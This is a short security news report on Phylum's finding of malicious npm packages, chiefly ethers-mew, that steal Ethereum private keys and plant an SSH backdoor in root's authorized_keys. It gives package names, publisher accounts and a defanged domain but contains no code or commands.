Recearchers at Phylum have uncovered a malicious campaign targeting developers' Ethereum wallets through npm packages. The packages aim to exfiltrate sensitive Ethereum private keys and gain unauthorized SSH access to victims' machines by inserting the attacker's public key into the root user’s authorized_keys file.

Some of the suspicious packages (ethers, mewethers, web3ethers, 6ethers, ethethers, aaaethers, auditethers-test) published by accounts under the names "crstianokavic" and "timyorks," show minimal variation, suggesting they were released for testing purposes. The most fully developed among them is a package called ethers-mew.

The recent campaign is similar to an earlier attack in August 2023, when  the researchers detected a rogue npm package named ethereum-cryptographyy. That package, a typosquat of a popular cryptocurrency library, exfiltrated Ethereum private keys to a server in China via a malicious dependency. However, the latest attack takes a more direct and subtle approach.

Rather than hiding malicious code within a dependency as seen in previous incidents, the attacker in this campaign embeds the harmful code directly into the package. The malicious code activates only when the package is actively used. This deviates from the typical malware approach, where the infection occurs as soon as the package is installed.

The attackers’ strategy allows them to siphon Ethereum private keys to a domain under their control, ether-sign[.]com. Not only does the package attempt to steal cryptocurrency, but it also adds a backdoor to the infected machine. Specifically, the ethers-mew package can modify the /root/.ssh/authorized_keys file, granting the attackers persistent remote access via SSH.

Phylum noted that the malicious packages, along with the authors' accounts, were only available on the npm registry for a brief period before being removed—likely by the attackers themselves—which might suggest testing or a trial run.